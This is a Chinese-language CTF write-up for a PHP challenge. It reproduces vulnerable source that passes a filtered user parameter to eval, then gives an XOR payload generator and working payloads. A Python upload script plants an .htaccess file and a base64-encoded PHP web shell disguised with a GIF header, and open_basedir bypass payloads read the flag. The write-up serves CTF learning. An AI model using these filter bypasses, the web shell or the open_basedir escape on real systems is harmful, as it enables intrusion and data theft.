进入环境,发现源码:
<?php
function get_the_flag(){
// webadmin will remove your upload file every 20 min!!!!
$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
if(!file_exists($userdir)){
mkdir($userdir);
}
if(!empty($_FILES["file"])){
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
$extension = substr($name, strrpos($name,".")+1);
if(preg_match("/ph/i",$extension)) die("^_^");
if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
if(!exif_imagetype($tmp_name)) die("^_^");
$path= $userdir."/".$name;
@move_uploaded_file($tmp_name, $path);
print_r($path);
}
}
$hhh = @$_GET['_'];
if (!$hhh){
highlight_file(__FILE__);
}
if(strlen($hhh)>18){
die('One inch long, one inch strong!');
}
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
die('Try something else!');
$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");
eval($hhh);
?>
在这道题中有大量的过滤 首先是 要求传入的变量长度小于18
紧接着就是严苛的正则匹配,我们前面有见过 这里要采用 异或 或者 取反 绕过
由于禁用了 ~
这里取反无法实现
这里放一篇师傅的抑或脚本:
<?php
$l = "";
$r = "";
$argv = str_split("_GET"); ##将_GET分割成一个数组,一位存一个值
for($i=0;$i<count($argv);$i++){
for($j=0;$j<255;$j++)
{
$k = chr($j)^chr(255); ##进行异或
if($k == $argv[$i]){
if($j<16){ ##如果小于16就代表只需一位即可表示,但是url要求是2位所以补个0
$l .= "%ff";
$r .= "%0" . dechex($j);
continue;
}
$l .= "%ff";
$r .= "%" . dechex($j);
}
}}
构造payload:
?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=phpinfo
flag竟然·在phpinfo里面感觉前面的原代码都没啥用
上网看了师傅们的wp后发现 这只是一种取巧的方法,正常的思路因该是:
?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%86}();&%86=get_the_flag
但是一片空白
上面还有代码没看,我们仔细研究下:
<?php
function get_the_flag(){
// webadmin will remove your upload file every 20 min!!!!
//每20分钟删除我们上传的文件
$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); //命名格式
if(!file_exists($userdir)){
mkdir($userdir); //判断文件是否存在 不存在 新建文件夹
}
if(!empty($_FILES["file"])){ //判断文件是否为空
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
$extension = substr($name, strrpos($name,".")+1); //令extension 变量等于文件后缀
if(preg_match("/ph/i",$extension)) die("^_^"); //不能以 php为后缀
if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
//获取的文件中不能含有 <?
if(!exif_imagetype($tmp_name)) die("^_^"); //判断图片文件头
$path= $userdir."/".$name;
@move_uploaded_file($tmp_name, $path);
print_r($path);
}
}
总结:
我们上传的文件后缀不能为 php 同时会检查文件头 不能含有 <?
- 不能为 php的话 可以上传.htaccess
- 检查文件头是否为 图片:GIF89a12
- 不能含有<? : 一般是使用
<script language="php"></script>
但这里php版本不支持使用 我们就直接 base64编码来进行绕过了
在这里直接使用上传脚本了:
import requests
import base64
htaccess = b"""
#define width 1337
#define height 1337
AddType application/x-httpd-php .ahhh
php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"
"""
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
url = "http://dfcea339-b6d8-4b48-99ac-9bfaecda5527.node4.buuoj.cn:81//?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"
files = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)
files = {'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)
得到上传路径:
``尝试访问上传脚本:
因为这里有open_basedir
的限制,我们不能直接访问flag
我们需要进行绕过
具体参考文章
payload:
?cmd=chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
?cmd=chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));
获得flag!